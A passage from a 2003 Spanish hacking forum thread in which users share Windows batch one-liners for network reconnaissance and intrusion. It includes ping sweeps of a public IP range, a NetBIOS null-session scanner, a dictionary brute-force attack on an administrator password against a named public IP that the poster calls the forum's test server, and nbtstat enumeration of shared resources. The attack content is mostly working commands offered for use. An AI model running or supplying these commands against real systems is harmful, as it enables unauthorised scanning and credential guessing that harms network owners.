Vic_Thor Super Miembro HXC

Publicado: Sab May 10, 2003 9:56 pm Asunto: Escanear ips a travez de ms-dos? Escaner cutre de ip's usando ping FOR /L %i IN (1,1,254) DO ping 80.36.230.%i >>escaner.txt esto escanerá las ip's del rango 80.36.230.1 a 254 y vuelca el contenido en el fichero escaner.txt, prepárate a leerlo, bueno con un editor puedes filtrar las respuestas positivas Versión mejorada jaja FOR /L %i IN (1,1,254) DO echo %time% %date%>>escaner.txt && ping -n 1 80.36.230.%i >>escaner.txt lo mismo pero con fecha y hora y con un sola petición de eco (no cuatro) EScaner Netbios xDDDD FOR /L %i IN (235,1,254) DO net use \\80.36.230.%i\ipc$ "" /u:"" 2>> nul && echo %date% >> escaner.txt && echo 80.36.230.%i >>escaner.txt Super!!! si puede establecer una sesión nula la escribe en escaner.txt, si no redirije la salida a nul, demasiao p'al cuerpo. Vamos mejor lo dejamos PD fíjate que en el último caso empieza por la dirección del server de pruebas de HxC, para que al

menos tengas una sin problemas Escríbelo tal cual, o lo copias y lo pegas en la línea de comandos, no pulses enter hasta finalizar todo, si no hay que poner los gorritos ^ Bueno, y ya puestos a escanear con la shell, tatachaaaannn

ATAQUE A NETBIOS POR DICCIONARIO, hala! a por la clave del administrador..... Se supone que existe un archivo que se llama claves.txt con un buen diccionario de palabras.... FOR /F %i IN (claves.txt) DO net use \\80.36.230.235\ipc$ %i /u:administrador Esto no para, mal asunto.... vamos a guardar la password, si la encontramos en un fichero llamado pass.txt FOR /F %i IN (claves.txt) DO net use \\80.36.230.235\ipc$ %i /u:administrador && echo clave: %i >> pass.txt Y si no queremos ver las salidas erroneas dentro del fichero.... FOR /F %i IN (claves.txt) DO net use \\80.36.230.235\ipc$ %i /u:administrador 2>>nul && echo clave: %i >> pass.txt Pues nada, ya sólo queda encontrar un buen diccionario y a asaltar el server de pruebas, que me parece que hay premio para el que lo consiga... uuuuuuuuuuuy, que se me fue la olla. Vaya tela! pero FUNCIONA!!!! amig@s

Seoman Gran Miembro HXC

Publicado: Dom May 11, 2003 11:02 pm Asunto:

Como el tema es muy interesante, y utilizando lo que a dejado Vic_Thor, sus dejo esto, haver que os parece:

Código: FOR /L %i IN (1,1,254) DO ping 192.168.0.%i -n 1|find "Respuesta desde">>escaner.txt

Que hace esto, pues sastamente lo mismo que el ping del Vic_Thor, pero este solo mete en el txt, los que responden al ping Algo un poco mas util que el de antes -------------------------------------------

Código: FOR /L %i IN (1,1,254) DO if Errorlevel = 0 ping 192.168.1.%i -n 1|find "Respuesta desde" && echo 192.168.1.%i >>escaner.txt

Que hace? Este es mas interesante... El if tiene una opcion (help if) que es el errorlevel. Esto es el codigo que retorna el programa una vez se a ejecutado. Usease, puede retornar un 0 si se a ejecutado correctamente, un 1 si ha fallado en una cosa, un 2 si ha fallado en otra, etc... El ping retorna un 0 si encuentra la ip, asi que obtenemos?Si una vez ejecutado el for, haceis un type escaner.txt obtendreis un resultado algo asi como:

Código: C:\>type escaner.txt 192.168.1.1 192.168.1.2 192.168.1.3

Y ahora os preguntareis... Pq tanto rollo de if si con lo que dava el otro, ya sabia las ips que estaban "en linia". Pues para poder realizar lo siguiente:

Código: FOR /F %i IN (escaner.txt) DO if Errorlevel = 0 nbtstat -a %i|find "<20>" & & echo %i >>netbios.txt

Bueno bueno, y este que hace?? Pues parecido al anterior, pero mete en el fichero de texto netbios.txt, las ip's de los que tienen algo compartido. el comando nbtstat, retorna un listado de recursos, y si hay un recurso compartido, lo marca con un <20>.

Pues ale, espero que os cunda ^^. No se si servira de algo, pero gueno, ahi lo dejo jejeje.